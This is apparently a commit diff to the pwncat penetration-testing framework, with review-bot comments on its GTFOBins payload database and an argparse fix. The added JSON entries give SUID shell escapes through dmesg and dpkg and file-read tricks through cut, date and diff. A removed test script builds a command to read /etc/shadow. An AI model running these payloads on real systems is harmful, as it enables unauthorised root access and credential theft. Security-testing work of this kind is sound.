Merge branch 'master' of github.com:calebstewart/pwncat
commit
ded22f18e4
@ -110,7 +110,7 @@
|
|||||||
},
|
},
|
||||||
{
|
{
|
||||||
"type": "read",
|
"type": "read",
|
||||||
"stream": "print",
|
"stream": "raw",
|
||||||
"payload": "{command} -c '{cat} {lfile}'",
|
"payload": "{command} -c '{cat} {lfile}'",
|
||||||
"suid": ["-p"],
|
"suid": ["-p"],
|
||||||
"exit": "{ctrl_d}"
|
"exit": "{ctrl_d}"
|
||||||
@ -465,8 +465,8 @@
|
|||||||
{
|
{
|
||||||
"type": "read",
|
"type": "read",
|
||||||
"stream": "base64",
|
"stream": "base64",
|
||||||
"payload": "{command}",
|
"payload": "{command} | {base64} -w 0",
|
||||||
"args": ["-s", "file://{lfile} --output - | {base64} -w 0"]
|
"args": ["-s", "file://{lfile} --output -"]
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
"type": "write",
|
"type": "write",
|
||||||
@ -485,8 +485,63 @@
|
|||||||
"type": "write",
|
"type": "write",
|
||||||
"stream": "base64",
|
"stream": "base64",
|
||||||
"payload": "TF=none; {command}; TF=$({mktemp}); {chmod} ugo+r $TF; {base64} -d > $TF; {command}; rm -f $TF",
|
"payload": "TF=none; {command}; TF=$({mktemp}); {chmod} ugo+r $TF; {base64} -d > $TF; {command}; rm -f $TF",
|
||||||
"args": ["-s", "file://$TF --output {lfile}"],
|
"args": ["-s", "file://$TF", "--output", "{lfile}"],
|
||||||
"exit": "{ctrl_d}"
|
"exit": "{ctrl_d}"
|
||||||
}
|
}
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"cut": [
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"stream": "print",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-d", "''", "-f1", "{lfile}"]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"date": [
|
||||||
|
{
|
||||||
|
// This is a janky reader that relies on cut to fully carve out the output.
|
||||||
|
"type": "read",
|
||||||
|
"stream": "print",
|
||||||
|
"payload": "{command} | {cut} -d \":\" -f2- | while read line; do echo ${{line:14:-1}}; done",
|
||||||
|
"args": ["-f", "{lfile}", "+\"%M%M%M%M%M%M\"", "2>&1"]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"diff": [
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"stream": "print",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["--line-format=%L", "/dev/null", "{lfile}"]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"dmesg": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-H"],
|
||||||
|
"input": "!{shell} -p\n",
|
||||||
|
"exit": "exit\nq\n"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"stream": "print",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-rF", "{lfile}"]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"dpkg": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-l"],
|
||||||
|
"input": "!{shell} -p\n",
|
||||||
|
"exit": "exit\nq\n"
|
||||||
|
}
|
||||||
]
|
]
|
||||||
|
|
||||||
}
|
}
|
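Review bot: The new `date` reader's `"payload"` line does not return the file faithfully: `read line` without `-r` strips backslashes and leading whitespace, `echo` may interpret escapes, and `${line:14:-1}` is a bash 4.2+ expansion that fails outright if the remote `{shell}` turns out to be dash or an older bash. The fixed offset of 14 also appears to be sized to GNU date's English `invalid date '…'` message, so a non-C locale would shift the carve and corrupt every line, and any input line that happens to parse as a valid date is replaced by the format output rather than echoed. At minimum I would write the loop as `while IFS= read -r line; do printf '%s\\n' \"${{line:14:-1}}\"; done` and extend the existing "janky reader" comment to state that it assumes GNU date, a C/POSIX locale and a bash-compatible `{shell}`. The adjacent `cut` entry has a similar portability caveat, since `-d ''` relies on cut accepting an empty delimiter, which I believe only GNU cut does.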
@ -1,40 +0,0 @@
|
|||||||
#!/usr/bin/env python3
|
|
||||||
|
|
||||||
|
|
||||||
from pwncat.gtfobins import *
|
|
||||||
import subprocess
|
|
||||||
|
|
||||||
|
|
||||||
def which(path: str, quote=False):
|
|
||||||
try:
|
|
||||||
output = subprocess.check_output(f"which {path}", shell=True)
|
|
||||||
except subprocess.CalledProcessError:
|
|
||||||
return None
|
|
||||||
|
|
||||||
return output.decode("utf-8").strip()
|
|
||||||
|
|
||||||
|
|
||||||
gtfo = GTFOBins("data/gtfobins.json", which)
|
|
||||||
|
|
||||||
|
|
||||||
binary_to_test = "curl"
|
|
||||||
# capabilities_to_test = Capability.SHELL
|
|
||||||
capabilities_to_test = Capability.WRITE
|
|
||||||
# capabilities_to_test = Capability.WRITE
|
|
||||||
our_shell = "/bin/bash"
|
|
||||||
|
|
||||||
binary = gtfo.find_binary(binary_to_test)
|
|
||||||
print(binary)
|
|
||||||
print(vars(binary))
|
|
||||||
|
|
||||||
methods = binary.iter_methods(
|
|
||||||
which(binary_to_test), caps=capabilities_to_test, stream=None
|
|
||||||
)
|
|
||||||
for method in methods:
|
|
||||||
# print(method)
|
|
||||||
# print(method.build(shell=our_shell, suid=True))
|
|
||||||
print(method.build(lfile="/etc/shadow", suid=True)[0])
|
|
||||||
# print(method.build(lfile="/tmp/test", data="hello")[0])
|
|
||||||
|
|
||||||
# all_binaries = list(gtfo.iter_methods(Capability.SHELL))
|
|
||||||
# print(all_binaries[0].build(shell="/bin/bash", suid=True))
|
|
@ -26,7 +26,7 @@ class StoreConstOnce(argparse.Action):
|
|||||||
def __call__(self, parser, namespace, values, option_string=None):
|
def __call__(self, parser, namespace, values, option_string=None):
|
||||||
if hasattr(self, "__" + self.dest + "_seen"):
|
if hasattr(self, "__" + self.dest + "_seen"):
|
||||||
raise argparse.ArgumentError(self, "only one action may be specified")
|
raise argparse.ArgumentError(self, "only one action may be specified")
|
||||||
setattr(self, "__" + self.dest + "_seen", True)
|
setattr(namespace, "__" + self.dest + "_seen", True)
|
||||||
setattr(namespace, self.dest, self.const)
|
setattr(namespace, self.dest, self.const)
|
||||||
|
|
||||||
|
|
||||||
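Review bot: After this change the duplicate-action guard can no longer fire: the marker is now stored on `namespace` (`setattr(namespace, "__" + self.dest + "_seen", True)`) but the check three lines above still reads it from `self` (`hasattr(self, "__" + self.dest + "_seen")`), which nothing sets any more, so two conflicting actions on one command line are silently accepted and the later one wins. The check should move with the flag: `if hasattr(namespace, "__" + self.dest + "_seen"):`. Note that the marker attribute is now visible to callers through `vars(namespace)`; if that matters, a single private name such as `_action_seen` would keep it out of the parsed result, but that is a style choice. The enclosing class `StoreConstOnce` begins outside the hunk; `__call__` itself is fully shown.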
|